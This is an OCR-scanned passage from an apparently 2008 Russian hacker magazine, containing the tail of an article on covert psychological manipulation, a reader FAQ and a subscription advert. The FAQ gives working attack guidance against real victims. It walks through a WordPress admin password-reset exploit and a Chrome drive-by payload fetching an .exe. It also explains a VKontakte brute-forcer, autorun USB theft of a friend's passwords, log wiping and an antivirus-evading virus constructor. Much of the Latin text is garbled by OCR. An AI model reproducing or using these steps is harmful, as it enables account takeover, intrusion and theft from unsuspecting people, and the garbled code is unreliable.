Мишенью воздействия может стать и чувство соперничества, стрем- 
ление быть лучше других. Например, фраза: «Леша, ты посмотри, под- 
ружка твоего друга в норковой шубе ходит, а тебе не стыдно, что твоя 
жена одета хуже?». Сначала идет вводная информация, которая дает 
точку отсчета. А во второй части предложения точка отсчета меняет- 
ся. Получаем классическую манипуляцию. Если для Алексея чувство 
соперничества актуально, то такая манипуляция с ним сработает. 

Еще одним способом формирования мишени может стать искусст- 
венное повышение ценности. Читал «Приключения Тома Сойера»? 
Там есть великолепный эпизод, в котором Том краситзабор, а 
мальчики, ежеминутно прибегающие, чтобы посмеяться над ним, в 
итоге оставались красить забор за него. Том Сойер просто-напрос- 
то повысил ценность своей работы до такой степени, что вызвал 
интерес сначалауБена.а потом у остальных. И они готовы были 
отдать яблоки, воздушного змея и прочие вещи за возможность 
покрасить забор! 

Формирование мишени также может быть построено на использо- 
вании силы. «Не для себя ведь стараюсь, для всей нашей группы» 

— прием с привлечением заемной силы. Силой здесь выступает 
некая группа людей, ради которой старается манипулятор. Стаким же 
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• Манипулятор играет 
людьми, какловкий 
кукловод играет мари- 
онетками. 

• Под манипуляцией 
подразумевают скры- 
тое (или подсозна- 
тельное) психологи- 
ческое воздействие на 
собеседника, с целью 
добиться выгодного 
манипулятору пове- 
дения. 

• Аттракция обознача- 
ет процесс взаимного 
тяготения людей друг 
кдругу, механизм 
формирования привя- 
занностей, дружеских 
чувств, симпатий, 
любви. 

• Эмпатия — спо- 
собность поставить 
себя на место другого 
человека, способность 
ксопереживанию. 



успехом можно было сослаться на начальство: «Я не воз- 
ражаю, но вот вышестоящее руководство категорически 
против» (тоже пример манипуляции с привлечением 
заемной силы). 

В ПРИМАНКИ 

Приманки — это некие крючки, на которые мы «цепля- 
ем»объект. Приманкой может быть захват воображения 
объекта. Что это значит? Это значит, в красках расписать 
преимущества, бонусы, светлое будущее так, чтобы жерт- 
ва прониклась всей той лапшой, которую мы собрались 
повесить ей на уши. Воображение — вообще важнейший 
объект манипуляции. Это способность творческая, и 
меньше всего она подвержена логике и традициям, а, 
значит, уязвима для воздействия извне. Скажем, толпу 
увлекают за собой, воздействуя на ее воображение. Не 
факты сами по себе поражаюттолпу, а то, каким образом 
они преподносятся. 

Мишенями, на которые оказывает воздействие мани- 
пулятор, также являются память и внимание. Задача 
манипулятора — в чем-то убедить людей. Для этого надо, 
прежде всего, привлечь внимание к сообщению, а затем 
сделатьтак, чтобы человек его запомнил (убедительно 
для насто, что остается в памяти). Этот вид приманки 
используется в рекламе, в политике и даже театре. Лите- 
ратурный пример использования захвата воображения: 
речь Остапа Бендера перед любителями шахмат в романе 
«12 стульев». 

Отдельно хотелось бы сказать про такую приманку, 
как обещания. Разные люди в разной степени верят 
обещаниям, но это, в любом случае, мощное оружие 
воздействия. Вспомним хотя бы доверчивых вкладчи- 
ков небезызвестной пирамиды «МММ» и многих других 
подобных компаний. 

Приманкой может быть все, что угодно: фраза, вопрос, 
анекдот, случай из жизни — все, что пробуждает интерес 
объекта и удерживает его внимание. В журналистике роль 
приманки играют крикливые заголовки. Если за гол о- 
вокстатьи интересный, цепляющий, привлекательный, 
то статья будет прочитана, а если заголовок скучный, 
блеклый, не вызывает никаких эмоций, то скорее всего ты 
просто пролистнешь этот материал и будешь читать что- 
нибудь с более интригующим названием. 




Пассивная защита: прикинуться «ветошью» и не реагиро- 
вать, упрямо двигаясь в своем направлении 



В АТТРАКЦИЯ 

Слово «аттракция» произведено от английского 
аигасБоп (притяжение, тяготение). В НЛП это близко 
к понятию «присоединение». Аттракция не считает- 
ся обязательным этапом, но она облегчает скрытое 
управление людьми. Дабы не углубляться в психологи- 
ческую теорию, опишутолько некоторые приемы. Один 
из них — комплимент. Главное, не путать его с грубой 
лестью. Комплимент — это особая форма похвалы, 
выражение одобрения, уважения или признания. Лесть 
же, как правило, — сильное преувеличение достоинств 
собеседника. Комплимент удовлетворяет важнейшую 
психологическую потребность человека — потребность 
в положительных эмоциях. Собеседник, умело говоря- 
щий комплименты, становится желанным, вызывает 
симпатию и, как следствие, доверие. 

Вызвать аттракцию можно и улыбкой, и просто внима- 
тельно слушая собеседника, и даже таким, казалось бы, 
незначительным приемом, как — назвать его по имени. 
Когда к человеку обращаются по имени, показывают вни- 
мание к его личности, то человек, получающий подтверж- 
дение, что он личность, испытывает чувство удовлетворе- 
ния, положительные эмоции, в результате чего возникает 
аттракция. «Обезличенное» же обращение служит 
сигналом того, что нами интересуются не как личностью, а 
лишь как носителем определенных функций. 

Не стоитсбрасывать со счетов и «невербальные» при- 
емы: визуальный контакт, жестикуляция, мимика (об этом 
читай в Х_02_2008]. Все это способы установки необходи- 
мого контакта, присоединения, ведущие каттракции. 

Н ПРИЕМЫ ВОЗДЕЙСТВИЯ 

Здесь тебе также открывается полный простор для вооб- 
ражения. Приемами воздействия может быть если не все, 
что угодно, то точно — оченьмногое. Скрытые приемы 
управления направленно воздействуют на сознание, 
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Скрытое 
управление 
в исторических 
примерах 



В одной из битв Суворов появился среди бегущих от неприяте- 
ля солдат и тут же крикнул им: «Молодцы, ребята, заманивай 
противника, заманивай!». Это высказывание подействовало 
на солдат отрезвляюще — они стали отступать более упорядо- 
ченно. Затем полководец скомандовал: «Стой, кругом!» и повел 
солдат в атаку. Тем самым он применил одну из техник скрыто- 
го управления, которая сегодня в психологии носит название 
«придание нового смысла». 

подсознание и бессознательное, побуждая человека кдействию. К 
таким приемам относятся внушение, причем как внушение взглядом, 
так и словом, всевозможные риторические приемы убеждения и даже 
манипулятивные способы подачи информации. 

Одним из известных способов манипулятивного, скрытого 
управления является утаивание информации или неполное ее 
освещение. Этот прием используют продажные журналисты с 
целью преподнести материал так, чтобы добиться соответствую- 
щей реакцииу читателя или слушателя. Широко распространен 
прием психологической догрузки. Например, фраза из рекламных 
роликов: «Мазда — автомобиль для успешных людей» (как будто 
все остальные автомобили изготавливают для неудачников!) — это 
манипуляция, называемая в психологии «ложная аналогия». 

Среди приемов воздействия особое место занимают уловки : «Не 
мое это дело», «Я, конечно, тебе никто, но мне кажется...», «Да, я 
ничего в этом не смыслю, но...» — все это фразы-манипуляторы. 
Цельтого, кто их употребляет — прикинуться случайным человеком 
в разговоре и уйти от контакта. 

К психологическим уловкам с целью скрытого управления относятся 
и выведение собеседника из равновесия, глумление, перебивание, 
передергивание (искажение) его слов. Отличным примером такого 
психологического манипулирования можно считать нашумевший 
диалог Кати Гордон и Ксении Собчак. В этом диалоге Ксения, пред- 
взято относясь к Кате, постепенно выводила ту из равновесия. Если 
ты еще не знаком с этим материалом, то рекомендую к ознакомлению, 
на просторах Сети можно найти какзапись эфира, так и просто пере- 
печатанный на слухдиалог. 

Мы с тобой уже говорили, что слабости людей — хорошее подспорье 
для скрытого управления. Еще одним приемом скрытого управления 
будет ставка на ложный стыд. Одна из слабостей человека — желание 
казаться лучше, чем он есть, или попросту желание не ударить в грязь 
лицом. Зная, что собеседник не силен в науке или какой-то другой 
области, можно приводить ложные доводы: «Тебе, конечно, известно, 
что ученые...» или «Общеизвестный факт, что...». Собеседник, боясь 
показать свое невежество, окажется в ловушке, — ему станет нечего 
возразить. 

г ЗАЩИТА ОТ МАНИПУЛИРОВАНИЯ 

Несмотря на все многообразие способов скрытого управления, можно 
выстроить надежную защиту. Схема ее будет выглядеть так: 

• Не давать информацию о себе. 

• Осознавать, что тобой управляют. 

• Применять пассивные и активные способы защиты. 

• Расставлять точки на і. 

• Использовать контрудар. 



Как мы уже разобрали ранее, первым шагом в манипулировании яв- 
ляется сбор информации об адресате. Следовательно, при защите мы 
с тобой эту информацию должны всячески оберегать. Здесь пригодят- 
ся такие качества как невозмутимость, умение скрывать свои эмоции 
и даже непредсказуемость. Ведь чем труднее манипулятору просчи- 
тать реакцию адресата, тем труднее подобрать ключ и управлять. 

Как понять, что тобой управляют? Ищи признаки манипуляции! Среди 
них: нарушение правил этики в твой адрес; элементы принуждения; 
ответственность за предлагаемое действие со стороны манипулятора 
целиком ложится на плечи адресата; дефицит времени, отпущенного 
на принятие решения. 

Если ты осознал, что тобой пытаются манипулировать, то начинай 
применять пассивные или активные техники защиты. К пассивной 
технике относится не реагирование на манипуляцию. Сделай вид, что 
не заметил, не расслышал, не обратил внимания, не понял. Не бойся 
использовать паузы, прежде чем ответить. Не реагируй спонтанно 
— помни, что манипулятор того и добивается, чтобы ты действовал 
необдуманно, в рамках нехватки времени. Кактивным защитам мож- 
но отнести расстановку точек на і. 

Для этого применяются вопросы и выражения: «что ты этим хотел 
сказать?», «скажи прямо», «что ты хочешь?» и т.д. Главной задачей 
активной защиты будет сделать из тайного, скрытого манипулирова- 
ния явное. Также к активным защитам относится контрудар (ответная 
манипуляция). Однако применять его нужно с осторожностью, так как 
это ведет, как правило, к открытому конфликту. 

Начинать изучение скрытого управления необходимо с изучения 
защиты. Также как настоящий хакер должен в совершенстве владеть 
вопросами информационной безопасности и способами защиты от 
всевозможных атак, так и психологическое воздействие удается луч- 
ше всего тем, кто в совершенстве владеет техника ми защиты. 

Н НАПУТСТВИЕ 

Внимательный читатель найдет много общего между скрытым 
управлением и некоторыми техниками НЛП (которые описывались 
в моей предыдущей статье). 

Мы многоеумеем, но не используем навыки осознанно. Именно 
осознание и намеренное применение полученных знаний дает 
нам дополнительные преимущества перед теми, кто действует на 
уровне бессознательных механизмов. Желаю тебе применять по- 
лученные знания с умом, не нанося вреда ни себе, ни окружающим. 
Удачи, т 
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Задавая вопрос, подумай! Не стоит задавать откровенно ламерские вопросы, 
ответы на которые при определенном желании можно найти и самому. Конкре- 
тизируй! Телепатов тут нет, поэтому присылай больше информации. 



-□ 



Существуютли найденные в последнее 
время такие же глобальные дыры в рЬр, 
как древняя 2епсІ_Иа5И_сІеІ_кеу_ог_ 
іпбех? 

А: Недавно оченьсерьезный эксперт по безопас- 
ности и автор Зибозіп-патча для РНРопублико- 
вал в своем блоге информацию об исследовании 
функций генерации случайных чисел гапсі ( ) 
и тС_гапс1 ( ) . Прочитать об этом подробнее 
ты сможешь по адресу: ЬНрТАллл/ѵѵ.зизрекС 
огд/2008/08/1 7/гтД згапсі-апсі-поі-зо-гапсіопп- 
питЬегз/ . Я же расскажутебе про суть баги. 

Итак: для гапсі () существует функция установ- 
ки зеесі (числа, на основе которого генерируется 
случайный номер). Эта функция называется 
згапсі ( ) . Для тД_гапсІ ( ) существует ана- 
логичная функция тД_згапсІ ( ) . Рассмотрим 
подробней, какже они работают. Выполни для 
этого следующий скрипт: 

<?рЬр 

ргіпД гапсі ( ) . гапсі ( ) ; 

?> 

Например, у тебя получилось 234 и 567. Снова 
запускай этот код, но перед первым вызовом 



гапсі () добавляй згапсі (234) (в качестве 
зеесі мы берем первое получившееся число). 

В результате ты увидишь 567 и второе — любое 
— число. То есть, зная любое сгенерированное 
функцией гапсі ( ) псевдослучайное число, 
мы легко сможем вычислить следующее 
псевдослучайное число. Теперь рассмотрим 
функцию шД_гапсІ ( ) . Тут все немного сложнее. 
Для начала запусти на нескольких машинах (и 
несколько раз) такой код: 

<?рЬр 

гтШ_згапсІ (13 37 ) ; 
есію тР_гапсІ ( ) . «\п»; 
есію тР_гапсІ ( ) . «\п»; 
есію тР_гапсІ ( ) ; 

?> 

Каждый раз у тебя должен получиться одинако- 
вый результат, так как зеесі используется один 
итотже. Здесь есть один нюанс. Если не опре- 
делять зеесі самому функцией шД_згапсІ() , 
то он может находиться в пределах от 0 до 
4294967295. Аесли иначе? 

Рассмотрим код, присутствующий в скрипте по- 
иска форума рЬрВ В2: 



<?рЪр 

шР_згапсІ ( (сІоиЬІе) тісгоДіте() * 
1000000 ) ; 

$зеагс1т_і(І = тР_гапсІ() ; 

?> 

Как пишет Стефан, в этом случае зеесі может 
лежать в пределах отО до всего лишь 1000000! 
Значит, потенциальному взломщику не соста- 
виттруда сбрутить зеесі, зная любое преды- 
дущее сгенерированноешЦ_гапсІ’ом число, а 
затем вычислить последующую псевдослучай- 
ную комбинацию! 

Так как на основе сгенерированных случайных 
чисел популярныескрипты генерятпароли, куки 
для входа и т.д., то найденная уязвимость пред- 
ставляет огромную угрозу безопасности для 
многих веб-приложений. 

Р.З. Основываясь как раз на этом баге, гагОг 
написал сплойт для сброса пароля админа в 
ѴѴогсІРгезз через утечку сгенерированного чис- 
ла в рбрВЕ>2. 

Почитать перевод статьи Стефана, а так- 
же скачать эксплойт ты сможешь на блоге 
гагОг’а по адресу ШрТ/гагОг.пате/агбсІез/ 
ргеб5ка2ѵѵает-5[исЬа]пѵе-сЫ5І.а-ѵ-рЬр . 
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0: Куда исчез известнейший хакер гдосі? 

А: На персональном сайте гдосГа ( геігодоб. 
аііегѵізіа.огд ] висит следующий пост: 

«I аш пок гдосі. І'т а кгіепсі о к Мз пашей 
Бапіеі . гдой йіей кѵго йауз адо ак ккак 
козрікаі іп Сакапіа. Ік иаз а зигргізе апй 
а зкоск. . . Со аіі о к из ѵкко кпем Мт. гдой 
ѵга.з зиккегіпд о к а гаге Ьопу таггои йізеазе, 
Іеайіпд Со рагаіузіз йигіпд Мз Іазк йауз. 
Ік зизС коок те а ѵккііе Со кідиге оиС коѵ7 Со 
каѵе ассезз Со гдосі' з ілгеЪзіке, зеагсМпд 
кке кеу оп Мз ІарСор (ткк регтіззіоп Сгот 
ССюзе сіозе Со Мт) Со розС СМз... I йоп 7 С к пом 
ѵйіаС кке СиСиге оС СМз зіСе МП іпѵоіѵе ЬиС 
І'й зиге Ііке Со зее ккезе розСз, апй зоте 
оС кке оккегз аЬоиС гдой розСей асгозз кке 
ІпСегпеС , ргезегѵей оп кке иеЪ іпйеСіпіСеІу . 
йизС зо ккак иЬеп Соікз доодіе кке пате ок 
гдой іп уеагз Со соте, ккеу'11 Ье аЫе Со 
геай ІС аіі» 

Пусть земля ему будет пухом ! 

Посмотретьи испытатьего нашумевшие экс- 
плойты ты всегда сможешь на милворме — 

ЬіІр://тіІѵѵ0гт.сот/аиіЬог/534. 

0: Что новенького из уязвимостей 
ѴѴогсІРгезз появилось в последнее время? 

А: Помимо появляющихся чутьли не каждый 
день эксплойтов к многочисленным плагинам 
Вордпресса, недавно появился забавный баг 
для версий 2. 5-2. 6.1 , связанный с усечением 
количества символов в базе данных в поле с 
логином пользователя. Баг позволяет поглу- 
миться над блогом, сбросив пароль админа. 
Пример: 

1. Если регистрация открыта, прохо- 
ди по ссылке ЬирУА/ісІіт.сот/ѵѵр-Іодіп. 
рбр?асІіоп=гедІ5І:ег. 

2. Регай пользователя сданными - 
логин: асІппіп[55 пробелов]х 
майл: твое мыло 

3. Послеуспешной регистрации в базе появ- 
ляется второй пользователь а б тіп (для тузді 
просто абтіп —то же самое, что и абтіп[55 
пробелов]]. Теперь проходи на форму восста- 
новления пароля ЬіІрУА/ісІіт.сот/ѵѵр-Іодіп. 
рбр?асІіоп=105Іра55ѵѵогб . где вписывай свое 
мыло, котороеты вводил при регистрации. 

4. Пройди полинку, который должен прийти тебе 
на мыло. 

5. Па роль настоящего админа изменится на вновь 
сгенеренный. Правда, ты его ни каким образом не 
узнаешь (так дела обстоят на момент написания 
фака]. Вот как незатейливо можно подшутить над 
админом недружелюбного блога :), 

Более подробно об этой уязвимости в мус- 
куле ты сможешь прочитать все на том же 
блоге Стефана Эссера: ЬіІрУ/ѵѵѵѵѵѵ.зизрекк 
огд/2008/08/18/тѵ5дІ-апб-здІ-соІиппп- 
ІгипсаІіоп-ѵиІпегаЬіІіІіез. 



0: Слышал, что с помощью Акізтеі, пла- 
гина для ѴѴогсІРгезз, знающие люди палят 
5Е0-темы. Расскажи, как это? 

А: Если утебя есть сплог на Вордпрессе, 
немедленно активируй в нем Акізтеі! Сейчас 
скажу, что это тебе даст. Просматривая коммен- 
тарии, помеченные, какспам, можно выудить, 
какминимум.три полезнейшие вещи: 

1. Ниши, которые сейчас спамят. 

2. Хосты, пригодные для выкладывания дорве- 
ев. Это либо фрихосты, либо свои домены; и те, и 
другие интересно отслеживать во времени. 

3. Различные дыры и баги для СМ5 и различных 
скриптов (если спамят 1 0 разных хостов с одно- 
типными урлами, то это однозначно результат 
эксплуатирования какого-то бага]. 

0: В браузере от Гугла, Ооодіе СГіготе, 
сразу же после его выпуска нашли дыры, 
расскажи о них подробней. 

А: Итак, все баги протестированы на 
ѴѴіпбоѵѵз ХР Ргоіеззіопаі ЭР 1 ,2,3. Для 
эксплуатации первой из них создай 
Ыт 1-страничку со ссылкой вида <а 
кгек= " ооо : %еѵі1 " ></а>. В результате 
Хром подвисаетсо всеми вкладками и авто- 
матически не перезагружается. 

Вторая бага позволяетзагрузить произвольный 
файл в систему жертвы. Для этого в хтмл-коде 
должны присутствовать следующие строки: 

<зсгірк>сІоситепк . ѵлгіке ( ’<ікгате 
згс= "кккр : //ехатріе . сот/кеііо . ехе " 
кгатеЪогсіег= " 0 " 
іліс1кк= " 0 " кеідкк= " 0 " > ’ ) ; 

</зсгірк> 

Также нельзя не отметить следующиеэксплойты 
под браузер от Гугла : 

• Ооодіе СЬготе ВгоѵѵзегО.2.149.27 Іпзресі; 
Еіетепі Бо5 Ехріоіі ( ЬіІрУ/ѵѵѵѵѵѵ.тіІѵѵОгпп. 
сот/ехр[оі1:5/6386 ): 

• Ооодіе СЬготе ВгоѵѵзегО.2.149.27 (ЗаѵеАз] 
Ретоіе ВОЕ Ехріоіі ( Ыір://ѵѵѵѵѵѵ.ппіІѵѵОгт. 
сот/ехрІоіІз/6367 ). 

0: Подскажи хороший брутфорс для «ВКон- 
такта». 

А: Код многопоточного брутфорса «Контакта» 
на перлеты можешь скопипастить здесь — 
Ыір:/Логит.апІісІіа1.ги/5Ьо\л/ро5ЕрЬр?р=85108 
4&розІсоипІ=683 . 

Запускай с помощью этой инструкции: 

1. Качай прогу АсѣіѵеРегІ 5.10.0.1001 с Ыір:// 
асііѵезіаіе.сот . 

2. Копируй код сплойта, сменив в его настрой- 
ках іб жертвы на нужное, и сохраняй под именем 
Ьгиіе.рі. 

3. Туда, где лежит сплойт, копируй файл со 
словарем, обзывая его раззі . кхк (словари 




легко ищутся Гуглом]; 

5. Запускай сплойт и жди результата в дооб.ІхЕ 
Р.З. Также советую попробовать автореггер 
для вышеуказанного сайта: ЫірУ/дгаЬЬеп. 
сот/зЬоѵѵро5І.рЬр?р=81243&ро5ІсоипІ=1 . 

0: Как быстро и незаметно скопировать 
пароли с компа жертвы к себе на флешку? 

А: Для этого нехитрого действа тебе понадо- 
бятся, собственно, ІІ5В-флешка и программа 
ІІЗВТЫе^ (ссылку на программу давать не буду 
по определенным причинам, ноты всегда 
можешь погуглить]. 

Распакуй архив с прогой. Далее из папки 
ІІЗВТЬіеІ скопируй все файлы на флешку, пря- 
мо в ее корень, не создавая никаких подпапок. 
Затем заряженную флешку вставь в компьютер 
свое го друга/девушки. Жди немного и уже дома 
проверяй папку битр. В ней будут храниться 
все найденные на компе пароли :]. 

Вся эта прелесть работает на банальном виндо- 
вом авторане с помощью следующего кода: 

[аикогші] 

аскіоп=Ореп Рііез Оп Роісіег 
ісоп=ісопз\сІгіѵе . ісо 
зке11ехесике=пігстс1. ехе ехестсі САЬЬ 
ЪакехеХргодзкагк .как 

Пока что ни один антивирус на это не реагирует. 

0: Как отключить в Винде автоматический 
запуск флешек и прочей нечисти? 

А:Дляэтоготебевсеголишьнадоотредактировать 
реестр гедебіЕом и перезапустить машину. Итак, 
ИДИ в НКЬМ\80ЕТМАКЕ\Місгозокк\Мпскжз\ 
СиггепкѴегзіоп\Ро1ісіез\Ехр1огег, ищи 
ключ ЫоЕгіѵеТуреАикоКип и прописывай для 
него одно из следующихзначений: 

0x1 — отключить автозапуск на приво- 
дах неизвестных типов; 

0x4 — отключить автозапуск съемных 
устройств ; 

0x8 — отключить автозапуск несъемных 
устройств ; 

0x10 — отключить автозапуск сетевых 
дисков ; 

0x20 — отключить автозапуск СБ-при- 
водов ; 

0x40 — отключить автозапуск НАМ- дис- 
ко в ; 

0x80 — отключить автозапуск на приво- 
дах неизвестных типов; 

0x95 — отключить автозапуск съемных, 
сетевых и неизвестных дисков; 

0x91 — отключить автозапуск сетевых и 
неизвестных дисков; 

ОхРР — отключить автозапуск вообще 
всех дисков . 
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0: Где Винда хранит свои логи, и каких 
почистить? 

А: Заходи в Мой компьютер Управление -> 
Просмотр событий, либо в Пуск Выполнить 
-> еѵепАл/ѵг.тзс Система. 

Логи содержатся в файлах АррЕѵепС . ЕѵС, 
ЗесЕѵепС . ЕѵЩ ЗузЕѵепС . ЕѵС и других. 
Просто такты не сможешь ихудалить, нотебе 
поможетпрограмма, не раз встречавшаяся на 
дисках от нашего журнала — ІМоскег. 

0: Существует ли какой-нибудь генератор 
или конструктор вирусов, с помощью кото- 
рого можно напакостить недругу? 

А: Почитай вотэтутему на античате: ЫТрУ/ 
Іогит.апбсЬаІ:.ги/і:ЬгеасІпаѵ36437-1 -1 0-ѵігив. 

Ыт . Некий 0Н0В_Т создал свой конструктор 
вирусов для Винды, который сможетсгенери- 
ровать не палящиеся антивирями программы- 
приколы (и нетолько]. 

Р.З. Хотя в комплекте и есть криптор, этот конс- 
труктор больше подходит для шуток над препо- 
дами в универе, друзьями или подружкой, чем 
для серьезной работы. 

0: Как скачать самую последнюю бету-вер- 
сию боодіе СИготе? 

А: Для этого понадобится специальная утилита 
СЬготе СЬаппеІЗѵуИсЬегІ ЬЛрУ/сЬготіипп. 

доодІесобе.сотЛіІез/сЬготесбаппеІ-І .О.ехе ). 

С ее помощьюты сможешьзакачиватьлибо 
самые последние беты (версии более-менее 
стабильные, а поэтому выходящие достаточно 
редко) или же последние беѵ-версии, которые 
выходят каждую неделю, разумеется, с самыми 
свежими фишками и баг-фиксами. Новых 
багов, естественно, также не избежать. 

0: У многих западных блоггеров вижу 
скриншоты с темной раскраской Ѵізиаі 
Біисііо. Это касается даже тех, кто не- 
посредственно участвует в разработке 
.Ыеі-платформы. Очень хочется попро- 
бовать: может быть действительно так 
удобнее? 

А: Готовую темную цветовую схему для Ѵізиаі 
5{ибіо, похожую на раскраску Ѵіт, можно 
скачать отсюда — ѵѵѵѵ.ѵѵекегоаб.сопп/ 
ѴіЬгапбпк Ѵ2 ЕхрогТгір . В архиве находится 
файл настроек, который необходимо импор- 
тировать в Ѵізиаі Зііисііо через меню«Тоо1з -> 
Ітрогі: Апб ЕхроИ: ЗеШпдз». Удобнее это или 
нет — вопрос спорный и решаемый индивиду- 
ально. Попробуй, возможно, тебе действитель- 
но понравится. Перемена обстановки всегда 
по-своему приятна. 

0: Как применять скрипты для 
Огеазетокеу в Орега? 

А: В то время как фанатам Рі геГох для ис- 



пользования хитрых скриптов Сгеазетопкеу, 
позволяющих до неузнаваемости изменять 
любимые страницы (например, интерфейс 
Отаіі] или, к примеру, убрать рекламу, необ- 
ходим специальный плагин, — для Орега их 
можно подключить без каких-либо допол- 
нительных при блуд. Первым делом тебе, 
конечно же, надо скачать нужный скрипт и 
переименовать его так, чтобы название фай- 
ла заканчивалось на «ѵѵбб изегдз». Далее в 
меню Орега переходим: «Тооіз -> Ргеіегепсез 
-> Абѵапсеб -> баѵа5сгір1: Орбопз». В этой 
форме есть один важный параметр — «ІІзег 
баѵа5сгір1: Гііез», который указывает на папку, 
где будут находиться пользовательские 
скрипты. Рекомендую для этих целей создать 
специальную папку. Вот и все. 

0: Как зарегистрироваться в АррІеБІоге без 
кредитной карты? 

А: Хороший выход из положения — восполь- 
зоваться так называемым бонусным кодом 
(Пебеет Собе], который раздается на раз- 
ных сайтах, например. ШрѴАл/ѵѵѵѵТипесоге. 
сотЛтееаПэит . Код дает возможность бес- 
платной регистрации (для 115) и бонус в виде 
скачивания 34 песен :]. Также будет доступна 
возможность іТипез Сепіиз — генерации 
плейлиста из похожих песен для выбранной 
композиции (что-то наподобие функционала 
1_аг1:Тпп ). 

Порядок регистрации в ІТипез: 

1. Полученный Пебеет Собе вводим в Арріе 
51юге, далеежмем «Ыеѵѵассоипі:». 

2. Заполняем поля регистрации. 

3. Заполняем анкету регистрации на страну 115. 
Для этого потребуется найти корректный аме- 
риканский адрес, например, найденный через 
Ѵеііоѵѵ Радев в бОвІаІев.сот . 

4. В качестве метода оплаты (Раутапі: Мебзоб] 
выбираем попеб. 

Жмем вибтіі; — и аккаунтактивирован! Пользу- 
емся на здоровье функционалом Сепіив и ска- 
чиваем обложки альбомов. 

0: Какой 55Н-демон можно установить для 
ѴѴіпсІоѵѵз Бегѵег 2008? 

А: Вариантов на самом деле много: 

• 55Н Тесііа 5егѵег ( уууууу.ззЬ.сопп ). 

• 0реп55Н ( бир://ѵѵѵ\ /ѵу.реІгі.со.іІ/веШр-ввЬ- 
зегѵег-ѵізІа.Ыт — инструкция по установке под 
ѴѴіпбоѵѵв ). 

• Ггее55НсІ ПіЦрТ/ѵѵѵѵѵѵТгееввЬб.сопп ]. 

• ѴѴіп55Нб ( ЬирѴ/ѵѵѵѵѵѵ.Ьбѵіве.сопп/ѵѵіпввІзб ]. 

• Крут Те1пеі/55Н БегѵегІ ЬНрУАл/ѵѵѵѵ.крѵпп. 

сот/еп/Оѵегѵіеѵѵ.Ыпп ). 

• сор55Н для ѴѴіпбоѵѵв (измененная версия 
0реп55Н]. 

• 5ѵвах МиШ-Бегѵег ( ШрѴ/ѵѵѵѵѵѵ.гѵгах.сопп/ 
зегѵег/іпбех.Ыт ). 




Рекомендую Ргее55Нб. Несмотря на бесплат- 
ность, он может предложить следующее: 

• Опции запуска 55Н6 только в определенных 
интерфейсах. 

• Различные способы аутентификации, вклю- 
чая интегрированную І\ІТІ_М -аутентификацию 
на ѴѴіпбоѵѵв АО. 

• Различные способы шифрования, включая 
АЕ5 1 28, АЕ5 256, 30Е5, ВІоѵѵбвЬ и т.д. 

• Опция создания защищенного туннеля в со- 
единении. 

• Опциональный 5есиге РТР (зРТР) — для безо- 
пасного РТР, смотреть РгееРТРб ѵѵебзТе. 

• Возможность управлять пользователями и ог- 
раничивать доступ к безопасной оболочке, бе- 
зопасномутуннелю и безопасному РТР. 

• Возможность предоставлять доступ только оп- 
ределенным узлам или подсетям. 

• Возможность регистрировать в журнал все 
подключения и команды, выполненные через 
Ргее55Нб. 

• Просмотр пользователей, подключенных в 
данный момент. 

• Автоматическое обновление Ргее55Нб. 

Чтобы войти, понадобится сделать две вещи. 
Во-первых, добавить новую пользовательскую 
учетнуюзаписьи разрешитьдоступ ккомандной 
строке 55Н. А во-вторых, открыть исключения в 
брандмауэре ѴѴіпбоѵѵв 5егѵег 2008 

Несколько месяцев назад установил 
ІЛ)ипІи, и... как бы глупо это ни звучало, но 
забыл пароль. Как его можно сбросить или 
восстановить? 

А: Ага, прям уж так взял и забыл? Нуда ладно, 
держи инструкцию: 

1. Перегрузи компьютер, и когда увидишь меню 
0РІ6В, нажми Е5С. 

2. Появится список ядер. Убедись, что ты вы- 
брал именното ядро, которые обычно использу- 
ешь (как правило, оно первое в списке), а затем 
нажми клавишу «е» для редактирования опций 
загрузки. 

3. Теперь нажми <стрелку вниз> и выберите оп- 
цию«кегпеІ». Потом используй еще раз клавишу 
«е»для переключения в режим редактирования 
опций ядра. 

4. Далееты увидишь окно с опция ми. Оттебя тре- 
буется удалить «го диіеС зріазіі» и добавить 
следующую команду: «гѵѵ іпіс = /Ьіп/Ъаз1і». 

5. После этого нажми <еп1:ег> для возврата в 
меню опций ядра. Дави клавишу <В> для загруз- 
ки с этой настройкой. 

6. Система загрузится в командную сроку, где 
можно ввести команду для сброса пароля: 

раззѵѵсі <изегпаше>. 

После изменения пароля введи команду зупс 
(гарантирует, что все данные будутзаписаны на 
диск перед перезагрузкой) и выполни перезаг- 
рузку: геЪооС ~ і . Е-Е 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. ( на 15% дешевле чем 

при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 
ЖЕЛЕЗО + ХАКЕР + ГТ СПЕЦ: 

- Один номер всего за 155 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 





Подписка на журнал «ХАКЕР+ЦѴЦ» на 6 месяцев 
стоит 1200 руб. 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте $иЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в 
редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату в 
ноябре, то журнал будете получать с января. 



По всем вопросам 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іпГо@дІс.ги или прояснить на сайте ѵѵѵѵѵѵ.СЮ.ги 



ПОДПИСНОЙ КУПОН 

